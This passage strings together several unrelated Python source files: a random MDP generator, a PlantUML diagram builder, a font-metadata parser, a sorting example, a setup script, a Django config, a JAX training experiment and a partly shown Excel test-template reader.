The current implementation does not support online, sample-based operation.
Instead, it is appropriate for value/policy iteration algorithm research.
"""
import functools
import jax
import jax.numpy as jnp
import numpy as np
from differential_value_iteration.environments import structure
def create(seed: int, num_states: int, num_actions: int,
branching_factor: int, dtype: np.dtype) -> structure.MarkovDecisionProcess:
"""Creates transition and reward matrices for GARET instance."""
rng_key = jax.random.PRNGKey(seed=seed)
garet_final_shape = (num_states, num_actions, num_states)
# Keys for branching_factor next state transitions for all (s, a) pairs.
new_keys = jax.random.split(rng_key, num_states * num_actions + 1)
new_state_keys = new_keys[1:]
rng_key = new_keys[0]
# For each (s,a) pair, determine next states using jax.random.choice.
# Use jax.vmap to calculate this in parallel for all (s,a) pairs.
next_state_fn = jax.vmap(jax.random.choice, in_axes=(0, None, None, None))
# Array of the indices of resulting states.
next_states_flat = next_state_fn(new_state_keys, num_states,
(branching_factor,), False)
# Generate transition probabilities for all branches.
rng_key, next_state_probs_key = jax.random.split(rng_key)
# Initial probabilities shape (|S| x |A|, b). Probabilities NOT normalized.
next_state_probs_flat_unnormalized = jax.random.uniform(
key=next_state_probs_key,
shape=(num_states * num_actions, branching_factor))
# Calculate sums per (s, a) and reshape conveniently for normalizing.
next_state_prob_sums = jnp.sum(next_state_probs_flat_unnormalized, axis=-1)
next_state_prob_sums = jnp.repeat(next_state_prob_sums, branching_factor)
next_state_prob_sums = next_state_prob_sums.reshape((-1, branching_factor))
# Normalize transition probabilities.
next_state_probs_flat = next_state_probs_flat_unnormalized / next_state_prob_sums
# Generate expected rewards for all branches.
rng_key, transition_reward_key = jax.random.split(rng_key)
transition_expected_rewards_flat = jax.random.normal(
key=transition_reward_key,
shape=(num_states * num_actions, branching_factor))
# Create the transition and reward matrices.
transition_matrix_flat = jnp.zeros(
shape=(num_states * num_actions, num_states),
dtype=jnp.float32)
reward_matrix_flat = jnp.zeros(
shape=(num_states * num_actions, num_states),
dtype=jnp.float32)
first_dim_indices = jnp.arange(num_states * num_actions)
first_dim_indices = first_dim_indices.repeat(branching_factor)
transition_matrix_flat = transition_matrix_flat.at[
first_dim_indices, next_states_flat.ravel()].set(
next_state_probs_flat.ravel())
reward_matrix_flat = reward_matrix_flat.at[
first_dim_indices, next_states_flat.ravel()].set(
transition_expected_rewards_flat.ravel())
transition_matrix = transition_matrix_flat.reshape(garet_final_shape)
reward_matrix = reward_matrix_flat.reshape(garet_final_shape)
# Marginalize rewards matrix for structure.MarkovDecisionProcess.
reward_matrix_marginalized = jax.vmap(jax.vmap(jnp.dot))(transition_matrix,
reward_matrix)
# Restructure for structure.MarkovDecisionProcess (A, S, S') vs (S, A, S').
transition_matrix = jnp.swapaxes(transition_matrix, 0, 1)
# Restructure for structure.MarkovDecisionProcess (A, S) vs (S, A).
reward_matrix_marginalized = jnp.swapaxes(reward_matrix_marginalized, 0, 1)
return structure.MarkovDecisionProcess(
transitions=np.array(transition_matrix, dtype=dtype),
rewards=np.array(reward_matrix_marginalized, dtype=dtype),
name=f'GARET S:{num_states} A:{num_actions} B:{branching_factor} K:{rng_key} D:{dtype.__name__}')
GARET1 = functools.partial(create,
seed=42,
num_states=4,
num_actions=4,
branching_factor=3)
GARET2 = functools.partial(create,
seed=42,
num_states=4,
num_actions=20,
branching_factor=3)
GARET3 = functools.partial(create,
seed=42,
num_states=10,
num_actions=2,
branching_factor=3)
GARET_100 = functools.partial(create,
seed=42,
num_states=100,
num_actions=2,
branching_factor=3)
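# Illustrative usage sketch (assumption: only the dtype is left unbound by the
# partials above). For example, GARET1(dtype=np.float64) builds a concrete MDP
# whose transitions are shaped (A, S, S') and rewards (A, S), as produced by create().
def _demo_garet1():
    return GARET1(dtype=np.float64)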
|
#! /usr/bin/env python3
######################################################################
#
# TOSCA Implementation Landscape
# Copyright (c) 2021 Inria
#
# This software is distributed under the Apache License 2.0
# the text of which is available at http://www.apache.org/licenses/LICENSE-2.0
# or see the "LICENSE-2.0.txt" file for more details.
#
# Author: Philippe Merle <philippe.merle@inria.fr>
#
######################################################################
import sys
import yaml
# Mapping of activity levels to PlantUML colors
COLORS = {
"ACTIVE": "PaleGreen",
"SLEEPING": "Orange",
"INACTIVE": "DarkRed",
"UNKNOWN": "White",
}
# Iconifiable labels
ICONS = [
"Eclipse",
"Forge",
"GitHub",
"SaaS",
"Spec",
"Website",
]
# Criteria
CRITERIA = {
"Status": None,
"TOSCA": { "sep": " + " },
"Target": { "sep": " + " },
"Usage": { "sep": " + " },
"Nature": { "sep": "\\n" },
"Language": { "sep": " + " },
"Links": { "sep": " " },
}
# Mapping of relationships to PlantUML arrows
RELATIONSHIPS = {
"contributes": "o--",
"hosts": "*-up-",
"uses": "..>",
"plugins": "<..",
"same ecosystem": "--",
"applied to": "..up..>",
}
# Arrows to force the PlantUML layout
ARROWS_TO_FORCE_THE_LAYOUT = [
"TOSCA_toolbox .up[hidden]. Cloudnet_TOSCA_Toolbox",
"Heat_Translator .up[hidden]. tosca_parser",
"Heat_Translator .up[hidden]. tosca_parser",
]
# Vertical layout of categories
LAYOUT_OF_CATEGORIES = [
"Open Standards",
"EU Funded Projects",
"TOSCA Modeling Tools",
"TOSCA Marketplaces",
"TOSCA Orchestrators",
"TOSCA Developer Tools",
"Open Source Communities",
]
def to_id(label):
for s in [' ', '.', '-']:
label = label.replace(s, '_')
return label
def serialize(data, iconable=False, sep=None):
if isinstance(data, float):
return str(data)
elif isinstance(data, str):
if iconable and data in ICONS:
return "<img:icons/%s.png{scale=0.5}>" % data
if data.endswith("\n"):
data = data[:-1]
return data.replace("\n", "\\n")
elif isinstance(data, list):
result = ''
s = ''
for d in data:
            if d is not None:
result += s + serialize(d, iconable=True)
s = sep
else:
result += " +\\n"
s = ''
return result
elif isinstance(data, dict):
result = ''
s = ''
for k, v in data.items():
result += s + "[[" + serialize(v, False) + " " + serialize(k, True) + "]]"
s = sep
return result
def generate_category(category_name, category_values, arrows, indent=''):
print(indent, 'package "**%s**" as %s {' % (category_name, to_id(category_name)), sep='', file=output_stream)
lindent = indent + " "
for impl_name, impl_values in category_values.items():
if impl_name == "categories":
for k, v in impl_values.items():
generate_category(k, v, arrows, lindent)
continue # skip to the next implementation
status = impl_values["Status"]
print(lindent, 'map "**%s**" as %s #%s {' % (impl_name, to_id(impl_name), COLORS[status]), sep='', file=output_stream)
for criteria_name, criteria_value in impl_values.items():
line = " " + criteria_name + " => "
if criteria_name == "Status":
continue # skip it as already handled
elif criteria_name in CRITERIA:
line += serialize(criteria_value, sep=CRITERIA[criteria_name]["sep"])
elif criteria_name in RELATIONSHIPS:
source_id = to_id(impl_name)
arrow = RELATIONSHIPS[criteria_name]
for target in criteria_value:
arrows.append("%s %s %s : <<%s>>" % (source_id, arrow, to_id(target), criteria_name))
continue # skip next print
print(lindent, line, sep='', file=output_stream)
print(lindent, "}", sep='', file=output_stream)
print(indent, "}", sep='', file=output_stream)
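# Usage sketch (assumed invocation): `python <this script> landscape.yaml` reads the
# YAML dataset given on the command line and writes a PlantUML diagram next to it
# (here, landscape.puml), which can then be rendered with PlantUML.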
# Main program
filename = sys.argv[1]
print("Load", filename)
with open(filename) as input_stream:
    dataset = yaml.safe_load(input_stream)
filename = filename[:filename.rindex('.')] + ".puml"
print("Generate", filename)
with open(filename, 'w') as output_stream:
print("@startuml", file=output_stream)
print("Title **TOSCA Implementation Landscape**", file=output_stream)
arrows = []
for category_name, category_values in dataset.items():
generate_category(category_name, category_values, arrows)
arrows.extend(ARROWS_TO_FORCE_THE_LAYOUT)
previous_category = LAYOUT_OF_CATEGORIES[0]
for category in LAYOUT_OF_CATEGORIES[1:]:
arrows.append("%s --[hidden]-- %s" % (to_id(previous_category), to_id(category)))
previous_category = category
for arrow in arrows:
print(arrow, file=output_stream)
print("@enduml", file=output_stream)
|
import data.fonts.character
class MetaFile:
def __init__(self, file, text_mesh_creator):
self.PAD_TOP = 0
self.PAD_LEFT = 1
self.PAD_BOTTOM = 2
self.PAD_RIGHT = 3
self.DESIRED_PADDING = 3
self.SPLITTER = " "
self.NUMBER_SEPARATOR = ","
self.aspect_ratio = 800 / 600
# self.aspect_ratio = display.get_width() / display.get_height()
self.vertical_per_pixel_size = None
self.horizontal_per_pixel_size = None
self.space_width = None
self.padding = 0
self.padding_width = 0
self.padding_height = 0
self.meta_data = {}
self.values = {}
self.value_pairs = {}
self.file = open(file, 'r')
self.load_padding_data()
self.load_line_sizes(text_mesh_creator)
image_width = self.get_value_of_variable("scale_w")
self.load_character_data(image_width, text_mesh_creator)
self.file.close()
def get_space_width(self):
return self.space_width
def get_character(self, ascii):
return self.meta_data.get(ascii)
def process_next_line(self): # check if this is right
self.values.clear()
line = self.file.readline().strip()
        if len(line) == 0:
return False
if line is not None:
for part in line.split(self.SPLITTER):
value_pairs = part.split("=")
if len(value_pairs) == 2:
self.values[value_pairs[0]] = value_pairs[1]
return True
def get_value_of_variable(self, variable):
return self.values[variable]
def get_values_of_variable(self, variable):
numbers = self.values[variable].split(self.NUMBER_SEPARATOR)
        actual_values = [0] * len(numbers)
        for i in range(len(actual_values)):
            # convert each field to an int so later padding arithmetic works on numbers
            actual_values[i] = int(numbers[i])
return actual_values
def load_padding_data(self):
self.process_next_line()
self.padding = self.get_values_of_variable("padding")
self.padding_width = self.padding[self.PAD_LEFT] + self.padding[self.PAD_RIGHT]
self.padding_height = self.padding[self.PAD_TOP] + self.padding[self.PAD_BOTTOM]
def load_line_sizes(self, text_mesh_creator):
self.process_next_line()
line_height_pixels = int(self.get_values_of_variable("line_height")[0]) - int(self.padding_height)
self.vertical_per_pixel_size = text_mesh_creator.LINE_HEIGHT / line_height_pixels
self.horizontal_per_pixel_size = self.vertical_per_pixel_size / self.aspect_ratio
def load_character_data(self, image_width, text_mesh_creator):
self.process_next_line()
self.process_next_line()
while self.process_next_line():
char = self.load_character(image_width, text_mesh_creator)
if char is not None:
self.meta_data[char.get_id()] = char
def load_character(self, image_size, text_mesh_creator):
id = int(self.get_value_of_variable("id"))
if id == text_mesh_creator.SPACE_ASCII:
self.space_width = (int(self.get_value_of_variable("xadvance")) - int(self.padding_width)) * \
self.horizontal_per_pixel_size
return None
x_texture = (int(self.get_value_of_variable("x")) + (int(self.padding[self.PAD_LEFT]) - self.DESIRED_PADDING)) / int(image_size)
y_texture = (int(self.get_value_of_variable("y")) + (int(self.padding[self.PAD_TOP]) - self.DESIRED_PADDING)) / int(image_size)
width = int(self.get_value_of_variable("width")) - (int(self.padding_width) - (2 * self.DESIRED_PADDING))
height = int(self.get_value_of_variable("height")) - (int(self.padding_height) - (2 * self.DESIRED_PADDING))
quad_width = width * self.horizontal_per_pixel_size
quad_height = height * self.vertical_per_pixel_size
x_texture_size = width / int(image_size)
y_texture_size = height / int(image_size)
x_offset = (int(self.get_value_of_variable("xoffset")) + int(self.padding[self.PAD_LEFT]) - self.DESIRED_PADDING) * self.horizontal_per_pixel_size
y_offset = (int(self.get_value_of_variable("yoffset")) + int(self.padding[self.PAD_TOP]) - self.DESIRED_PADDING) * self.vertical_per_pixel_size
x_advance = (int(self.get_value_of_variable("xadvance")) - int(self.padding_width)) * self.horizontal_per_pixel_size
return data.fonts.character.Character(id, x_texture, y_texture, x_texture_size, y_texture_size, x_offset, y_offset, quad_width, quad_height, x_advance)
|
from .code import qsort as sort_func
EXAMPLES = [
[],
[1],
[1, 2],
[2, 1],
[1, 1],
[1, 2, 3],
[1, 3, 2],
[2, 1, 3],
[2, 3, 1],
[3, 1, 2],
[3, 2, 1],
[1, 2, 2],
[1, 1, 2],
[1, 1, 1],
]
def print_examples():
for example in EXAMPLES:
try:
print(f"sort_func({str(example)}) = {str(sort_func(example))}")
        except Exception:
print(f"sort_func({str(example)}) => EXCEPTION RAISED")
if __name__ == "__main__":
print_examples()
|
# -*- coding: utf-8 -*-
import io
import ast
from re import compile
from setuptools import setup
def _get_version():
version_re = compile(r"__version__\s+=\s+(.*)")
with open("up2s3.py", "rb") as fh:
version = ast.literal_eval(
version_re.search(fh.read().decode("utf-8")).group(1)
)
return str(version)
def _get_author():
author_re = compile(r"__author__\s+=\s+(.*)")
mail_re = compile(r"(.*)\s<(.*)>")
with open("up2s3.py", "rb") as fh:
author = ast.literal_eval(
author_re.search(fh.read().decode("utf-8")).group(1)
)
mail = mail_re.search(author)
return (mail.group(1), mail.group(2)) if mail else (author, None)
def _get_readme():
with io.open("README.rst", "rt", encoding="utf8") as f:
return f.read()
version = _get_version()
(author, email) = _get_author()
setup(
name="up2s3",
version=version,
license="Apache 2.0",
author=author,
author_email=email,
description="Save uploaded pictures in AWS S3.",
long_description=_get_readme(),
url="https://github.com/sapicd/up2s3",
py_modules=[
"up2s3",
],
zip_safe=False,
install_requires=["boto3"],
)
|
from __future__ import unicode_literals
from django.apps import AppConfig
class ThreadsConfig(AppConfig):
name = 'threads'
|
from __future__ import absolute_import, division
from __future__ import print_function
import matplotlib.pyplot as plt
from jax.api import jit, grad
from jax.config import config
import jax.numpy as np
import jax.random as random
import numpy as onp
import sys
config.update("jax_enable_x64", True)  # actually enable 64-bit floats (a bare module variable has no effect)
np.set_printoptions(threshold=sys.maxsize)
def gen_data_y(params, inputs):
print("Generating Y data values: ")
for W, b in params:
outputs = np.dot(inputs, W) + b
inputs = sigmoid(outputs)
print("Max abs pure y generated: ", np.max(np.abs(outputs)))
return outputs
def gen_data_noise(key, params, inputs, noise_covariance):
print("Generating Y data noise: ")
for W, b in params:
outputs = np.dot(inputs, W) + b
inputs = sigmoid(outputs)
total_noise = outputs + random.multivariate_normal(key, np.zeros(outputs.shape[1]), noise_covariance, (outputs.shape[0],))
print("Sum noise model noise", np.sum(np.abs(outputs)))
print("Sum noise: ", np.sum(total_noise))
print("Abs Sum noise: ", np.sum(np.abs(total_noise)))
print("Noise shape:", total_noise.shape)
print("Max abs noise: ", np.max(np.abs(total_noise)))
return total_noise
def init_random_params(key, position, scale, layer_sizes):
"""Build a list of (weights, biases) tuples,
one for each layer in the net."""
return [(random.uniform(key, shape=(m,n), dtype=onp.float64, minval=-scale, maxval=scale)+position, #weight matrix
random.uniform(key, shape=(n,), dtype=onp.float64, minval=-scale, maxval=scale)+position) #bias vector
for m, n in zip(layer_sizes[:-1], layer_sizes[1:])]
def sigmoid(x):
return np.where(x >= 0, 1/(1+np.exp(-x)), np.exp(x)/(1+np.exp(x)))
def softmax(x):
return np.exp(x-np.max(x, axis=1).reshape(x.shape[0],1))/np.sum(np.exp(x-np.max(x, axis=1).reshape(x.shape[0],1)), axis=1).reshape(x.shape[0],1)
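# Illustrative check (not used by the experiment below): the numerically stable
# sigmoid and the max-shifted softmax behave as expected on tiny inputs.
def _demo_activations():
    x = np.array([[1.0, 2.0, 3.0], [0.0, 0.0, 0.0]])
    row_sums = softmax(x).sum(axis=1)  # -> approximately [1., 1.]
    probs = sigmoid(np.array([-1e3, 0.0, 1e3]))  # -> [0., 0.5, 1.] while staying finite
    return row_sums, probs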
def neural_net_predict(params, inputs):
"""Implements a deep neural network for classification.
params is a list of (weights, bias) tuples.
inputs is an (N x D) matrix."""
#print("Their params: ###########################################################################################")
#print(params)
for W, b in params:
outputs = np.dot(inputs, W) + b
inputs = sigmoid(outputs) # This doesn't affect the final output of the last layer
return outputs
def neural_net_predict_model(params, inputs):
"""Implements a deep neural network for classification.
params is a list of (weights, bias) tuples.
inputs is an (N x D) matrix."""
for W, b in params[0:len(params)-2]:
outputs = np.dot(inputs, W) + b
inputs = sigmoid(outputs) # This doesn't affect the final output of the last layer
for W, b in params[len(params)-2:]:
outputs = np.dot(inputs, W) + b
inputs = outputs
return outputs
def mean_square_error(params, inputs, targets):
net_out = neural_net_predict(params, inputs)
return (1/inputs.shape[0])*np.sum(np.power((net_out - targets),2))
def mean_square_error_model(params, inputs, targets):
net_out = neural_net_predict_model(params, inputs)
return (1/inputs.shape[0])*np.sum(np.power((net_out - targets),2))
def relative_error(params, inputs, targets):
net_out = neural_net_predict(params, inputs)
return np.mean(np.abs((net_out - targets)/targets))
def accuracy(params, inputs, targets):
target_class = np.argmax(targets, axis=1)
predicted_class = np.argmax(neural_net_predict(params, inputs), axis=1)
return np.mean(predicted_class == target_class)
def jeffreys_dist(model_params, true_params, train_data, train_labels, noise_covar, test_data, test_labels, itr):
model_like = np.sum(-(1/(2*noise_covar))*np.power(train_labels-neural_net_predict_model(model_params, train_data), 2))
true_like = np.sum(-(1/(2*noise_covar))*np.power(train_labels-neural_net_predict(true_params, train_data), 2))
return np.array([model_like, true_like])
def track_errors(model_params, train_data, train_labels, noise_covar, test_data, test_labels, itr):
train_model_error = np.mean(np.power(train_labels-neural_net_predict_model(model_params, train_data), 2))
test_model_error = np.mean(np.power(test_labels-neural_net_predict_model(model_params, test_data), 2))
    rel_model_error = np.mean(np.abs((neural_net_predict_model(model_params, test_data) - test_labels) / test_labels))  # relative error, matching relative_error() above
return np.array([train_model_error, test_model_error, rel_model_error])
def main():
# Hyper Parameters
true_param_scale = 1.5
net_param_scale = 1.0
noise_param_scale = 0.0
batch_size = 50
num_epochs = 300
#step_size = 0.0008 #0.0003 #*0.0005
track_file = open('trainings.txt', 'w')
for k in range(1000):
log_file = open('most_recent_log_' + str(k) + '.txt', 'w')
log_file.write("Model Likelihoods | True Likelihoods | Train Errors | Test Errors\n")
print("Training ", k)
key = random.PRNGKey(onp.random.randint(0,100000000))
# Model parameters
true_net_size = onp.random.randint(5,15)
print("True net size: ", true_net_size)
model_net_size = onp.random.randint(true_net_size+5,25) # Make sure model is deeper than true net
print("Model net size: ", model_net_size)
noise_layers = [100, 1]
true_layers = onp.append(onp.random.randint(5,100, true_net_size), 1)
true_layers.sort()
true_layers = true_layers[::-1]
true_layers[0] = 100
print("True model layer sizes: ", true_layers)
layer_sizes = onp.append(onp.random.randint(true_layers[-2],100, model_net_size), 1) #Make sure model doesn't have smaller layers
layer_sizes.sort()
layer_sizes = layer_sizes[::-1]
layer_sizes[0] = 100
print("Train model layer sizes: ", layer_sizes)
true_param_position = random.uniform(key, shape=(1,), dtype=onp.float64, minval=-0.5, maxval=0.5) #*-0.5 0.5 #-1.0 1.0
print("True Params position: ", true_param_position)
true_model = init_random_params(key, true_param_position, true_param_scale, true_layers)
noise_model = init_random_params(key, 0.0, noise_param_scale, noise_layers)
print("Loading data...")
train_data = random.uniform(key, shape=(50,100), dtype=onp.float64, minval=0.0, maxval=1.0) #(500,100) maxval=1.0
test_data = random.uniform(key, shape=(1000,100), dtype=onp.float64, minval=0.0, maxval=1.0) #(500, 100) maxval=1.0
noise_covar = random.uniform(key, shape=(layer_sizes[-1],layer_sizes[-1]), dtype=onp.float64, minval=0.6, maxval=0.6)#0.2 0.2#0.4 0.4*
noise_for_train_labels = gen_data_noise(key, noise_model, train_data, noise_covar)
train_labels_clean = gen_data_y(true_model, train_data)
train_labels = train_labels_clean + noise_for_train_labels
test_labels = gen_data_y(true_model, test_data)
print("Test labels mean: ", np.mean(np.abs(test_labels)))
print("test labels abs max: ", np.max(np.abs(test_labels)))
print("Test labels variance: ", np.var(test_labels))
num_train = train_data.shape[0]
num_complete_batches, leftover = divmod(num_train, batch_size)
num_batches = num_complete_batches + bool(leftover)
def data_stream():
rng = onp.random.RandomState()
while True:
perm = rng.permutation(num_train)
for i in range(num_batches):
batch_idx = perm[i * batch_size:(i + 1) * batch_size]
yield train_data[batch_idx], train_labels[batch_idx]
batches = data_stream()
@jit
def update(params, batch, step_size):
grads = grad(mean_square_error_model)(params, batch[0], batch[1])
return [(w - step_size * dw, b - step_size * db) for (w, b), (dw, db) in zip(params, grads)]
likes_cross_points = np.array([])
error_turn_points = np.array([])
jeff_errors_list = np.array([])
diff_errors_list = np.array([])
min_test_errors = np.array([])
likes_diffs = np.array([])
rel_jeff_errors_list = np.array([])
rel_min_test_errors = np.array([])
rel_diff_errors_list = np.array([])
for step_size in [0.0008]: #onp.arange(0.0001, 0.0011, 0.0002):
print("Training with step_size: ", step_size)
params = init_random_params(key, 0.0, net_param_scale, layer_sizes)
model_likelihoods = np.array([])
true_likelihoods = np.array([])
train_errors = np.array([])
test_errors = np.array([])
relative_errors = np.array([])
print(" Epoch | Train loss | Test loss | Dist Train Loss | Dist Test Loss")
for i in range(1,num_epochs):
for _ in range(num_batches):
params = update(params, next(batches), step_size)
jd_point = jeffreys_dist(params, true_model, train_data, train_labels, noise_covar, test_data, test_labels, i)
err_point = track_errors(params, train_data, train_labels, noise_covar, test_data, test_labels, i)
model_likelihoods = np.append(model_likelihoods, jd_point[0])
true_likelihoods = np.append(true_likelihoods, jd_point[1])
train_errors = np.append(train_errors, err_point[0])
test_errors = np.append(test_errors, err_point[1])
relative_errors = np.append(relative_errors, err_point[2])
train_loss = mean_square_error_model(params, train_data, train_labels)
test_loss = mean_square_error_model(params, test_data, test_labels)
true_train_loss = mean_square_error(true_model, train_data, train_labels)
true_test_loss = mean_square_error(true_model, test_data, test_labels)
rel_train_loss = relative_error(params, train_data, train_labels)
rel_test_loss = relative_error(params, test_data, test_labels)
rel_true_train_loss = relative_error(true_model, train_data, train_labels)
rel_true_test_loss = relative_error(true_model, test_data, test_labels)
print("{:15}|{:20}|{:20}|{:20}|{:20}".format(i, train_loss, test_loss, true_train_loss, true_test_loss))
log_file.write(str(i)+","+str(train_loss)+","+str(test_loss)+","+str(true_train_loss)+","+str(true_test_loss)+
","+str(rel_train_loss)+","+str(rel_test_loss)+","+str(rel_true_train_loss)+","+str(rel_true_test_loss)+"\n")
log_file.flush()
like_diffs = np.abs(true_likelihoods - model_likelihoods)
likes_cross = np.argmin(like_diffs)
error_turn = np.argmin(test_errors)
jeff_error = test_errors[likes_cross]
min_test_error = test_errors[error_turn]
diff_errors = jeff_error - test_errors[error_turn]
rel_jeff_error = relative_errors[likes_cross]
min_rel_error = relative_errors[error_turn]
diff_rel_error = rel_jeff_error - relative_errors[error_turn]
likes_cross_points = np.append(likes_cross_points, likes_cross)
error_turn_points = np.append(error_turn_points, error_turn)
jeff_errors_list = np.append(jeff_errors_list, jeff_error)
diff_errors_list = np.append(diff_errors_list, diff_errors)
min_test_errors = np.append(min_test_errors, test_errors[error_turn])
likes_diffs = np.append(likes_diffs, like_diffs[likes_cross])
rel_jeff_errors_list = np.append(rel_jeff_errors_list, rel_jeff_error)
rel_min_test_errors = np.append(rel_min_test_errors, min_rel_error)
rel_diff_errors_list = np.append(rel_diff_errors_list, diff_rel_error)
print("Found likelihood cross point: ", likes_cross)
print("Found error min point: ", error_turn)
print("Difference in Jeffreys error and min error: ", diff_errors)
print("Minimum test error: ", test_errors[error_turn])
print("Difference in likelihoods at cross point: ", like_diffs[likes_cross])
print("Jeffreys Relative Error: ", rel_jeff_error)
print("Minimum MSE point relative error: ", min_rel_error)
print("Difference in Jeffreys relative error and min MSE error point relative error: ", diff_rel_error)
best_test_error_training = np.argmin(min_test_errors)
print("List of minimum test errors: ", min_test_errors)
#print("Best training learning rate: ", onp.arange(0.0001, .0011, 0.0001)[best_test_error_training])
best_likes_cross = likes_cross_points[best_test_error_training]
best_error_turn = error_turn_points[best_test_error_training]
best_diff_errors = diff_errors_list[best_test_error_training]
best_min_test_error = min_test_errors[best_test_error_training]
best_likes_diff = likes_diffs[best_test_error_training]
best_rel_jeff_error = rel_jeff_errors_list[best_test_error_training]
best_min_rel_error = rel_min_test_errors[best_test_error_training]
best_rel_diff_error = rel_diff_errors_list[best_test_error_training]
training_data_variance = np.var(train_labels_clean)
noise_for_train_data_variance = np.var(noise_for_train_labels)
test_data_variance = np.var(test_labels)
print("Found best likelihood cross point: ", best_likes_cross)
print("Found best error min point: ", best_error_turn)
print("Best difference in Jeffreys error and min error: ", best_diff_errors)
print("Best minimum test error: ", best_min_test_error)
print("Best difference in likelihoods at cross point: ", best_likes_diff)
track_file.write(str(k) + "," + str(best_likes_cross) + "," + str(best_error_turn) + "," + str(best_diff_errors) + ","
+ str(best_min_test_error) + "," + str(best_likes_diff) + "," + str(true_net_size) + "," + str(model_net_size) +
"," + str(best_rel_jeff_error) + "," + str(best_min_rel_error) + "," + str(best_rel_diff_error) + "," +
str(training_data_variance) + "," + str(test_data_variance) + "," + str(noise_for_train_data_variance) + "\n")
track_file.flush()
log_file.close()
if __name__ == '__main__':
main()
|
# coding:utf-8
import logging
import time
import xlwings as xw
import pandas as pd
import re
import datetime
import pythoncom
logger = logging.getLogger('ghost')
class BoardExcel(object):
'''
    Baseband board test template.
'''
sheets_name = ['整机设定', '定标', '灵敏度', '搜网', '自激']
dl_keywords = ['基带设定', '输出功率测试', 'EVM测试', 'ACPR测试',
                   '占用带宽测试', '频偏测试', '峰均比测试']  # keywords identifying the downlink-test sub-tables
suffix = ['开始', '结束']
dl_rows = dict()
    jump_row = 3  # skip the 3 title rows at the top of each sub-table
def open_excel(self, path):
try:
pythoncom.CoInitialize()
print('open_excel={}'.format(path))
self.app = xw.App(visible=False, add_book=False)
self.app.display_alerts = False
self.app.screen_updating = False
self.wb = self.app.books.open(r'{}'.format(path))
# self.wb = xw.Book(r'{}'.format(path))
return True
except Exception as e:
logger.error(e)
raise NotImplementedError('no excel file')
def get_first_cell(self, shtname):
'''
        Get the contents of the first cell of every row.
:return:
'''
sht = self.wb.sheets(shtname)
rowcount = sht.api.UsedRange.Rows.count
rng = sht.range('A1:A{}'.format(rowcount))
lst = rng.value
return lst
def get_lowtemp_level_rows(self):
'''
        Get the row numbers of the low-temperature gear output table.
:return:
'''
shtname = self.sheets_name[1]
        cell_lst = self.get_first_cell(shtname)  # first-column cells of all rows
band_rows = dict()
for idx, cell in enumerate(cell_lst):
if cell is None:
continue
band_rows.setdefault(cell.upper(), idx + 1)
self.ll_rows = band_rows
def get_normaltemp_level_rows(self):
'''
        Get the row numbers of the normal-temperature gear output table.
:return:
'''
shtname = self.sheets_name[2]
        cell_lst = self.get_first_cell(shtname)  # first-column cells of all rows
band_rows = dict()
for idx, cell in enumerate(cell_lst):
if cell is None:
continue
band_rows.setdefault(cell.upper(), idx + 1)
self.nl_rows = band_rows
def get_hightemp_level_rows(self):
'''
        Get the row numbers of the high-temperature gear output table.
'''
shtname = self.sheets_name[3]
        cell_lst = self.get_first_cell(shtname)  # first-column cells of all rows
band_rows = dict()
for idx, cell in enumerate(cell_lst):
if cell is None:
continue
band_rows.setdefault(cell.upper(), idx + 1)
self.hl_rows = band_rows
def get_dl_rows(self):
'''
        Get the row numbers of the sub-tables corresponding to every downlink keyword.
:return:
'''
ul_shtname = self.sheets_name[1]
cell_lst = self.get_first_cell(ul_shtname)
item_idx = {k: [] for k in self.dl_keywords}
for idx, item in enumerate(cell_lst):
if item is None:
continue
for keyword in self.dl_keywords:
startkeyword = keyword + self.suffix[0]
endkeyword = keyword + self.suffix[1]
if startkeyword in item:
item_idx[keyword].append(idx + 1 + 1)
if endkeyword in item:
item_idx[keyword].append(idx)
self.dl_rows = item_idx
def get_set_condition(self, cellid):
'''
cellid:0/1
        Get the downlink setting conditions: board type under test and band. By default there is only one board type, either all 8125 or all T2K.
:return:
'''
try:
rows = self.dl_rows['基带设定']
sht = self.wb.sheets(BoardExcel.sheets_name[1])
startrow = rows[0] + 2
endrow = rows[1]
celllst = sht.range('A{}:G{}'.format(startrow, endrow)).value
type = ''
cellstr = 'cell{}'.format(cellid)
bandstr = ''
            freqpoint_dict = dict()  # high/mid/low frequency points
            freq_dict = dict()  # high/mid/low frequencies
for itemlst in celllst:
for idx, item in enumerate(itemlst):
if item is None:
if idx % 2 != 0:
freqpoint_dict.setdefault(bandstr, []).append(None)
else:
freq_dict.setdefault(bandstr, []).append(None)
continue
if idx == 0:
temp = item.strip().split('_')
type = temp[0].upper()
thiscell = temp[2].lower()
bandstr = temp[3].upper()
if thiscell != cellstr:
break
continue
if idx % 2 != 0:
freqpoint_dict.setdefault(bandstr, [])
freqpoint_dict[bandstr].append(item)
else:
freq_dict.setdefault(bandstr, [])
freq_dict[bandstr].append(item)
return freqpoint_dict, freq_dict
except Exception as e:
raise RuntimeError('get_set_condition error:{}'.format(e))
def get_id(self):
'''
        Get the baseband board ID.
:return:str
'''
try:
sht = self.wb.sheets(BoardExcel.sheets_name[0])
a1 = sht.range('B1').value
a2 = sht.range('B2').value
arm_ver = str(a1).strip()
bb_ver = str(a2).strip()
return arm_ver, bb_ver
except Exception as e:
raise ValueError('get_id error:{}'.format(e))
finally:
self.close_file()
def write_bbver_sn(self, bbver, sn):
try:
logger.debug('write_bbver_sn')
sht = self.wb.sheets(BoardExcel.sheets_name[0])
sht.range('B1').value = sn
sht.range('B2').value = bbver
            today = datetime.date.today().strftime('%y-%m-%d')  # returns a string
sht.range('B5').value = today
except Exception as e:
raise ValueError('get_id error:{}'.format(e))
else:
self.wb.save()
finally:
self.close_file()
def get_offset(self):
'''
        Get the attenuation compensation (offset) value.
:return:
'''
try:
sht = self.wb.sheets(BoardExcel.sheets_name[1])
a1 = sht.range('B1').value
offset = str(a1).strip()
return offset
except Exception as e:
raise ValueError('get_offset error:{}'.format(e))
finally:
self.close_file()
def get_band_dl_para(self):
'''
        Get the baseband setting conditions.
:return:dataframe
'''
try:
rows = self.dl_rows['基带设定']
sht = self.wb.sheets(BoardExcel.sheets_name[0])
startrow = rows[0]
endrow = rows[1]
df = sht.range('A{}:G{}'.format(startrow, endrow)).options(pd.DataFrame, header=2).value
df.columns = [['高', '高', '中', '中', '低', '低'], ['频点', '下行频率', '频点', '下行频率', '频点', '下行频率']]
return df
except Exception as e:
raise ValueError('get_band_dl_para error:{}'.format(e))
def get_txatt_norm(self, cell_band):
'''
        Get the TXATT spec limits.
        :return: list [lower limit, nominal value, upper limit]
'''
try:
shtname = BoardExcel.sheets_name[1]
sht = self.wb.sheets(shtname)
rows = self.dl_rows['输出功率测试']
row_dict = self.get_each_cellband_row(shtname, rows[0], rows[1])
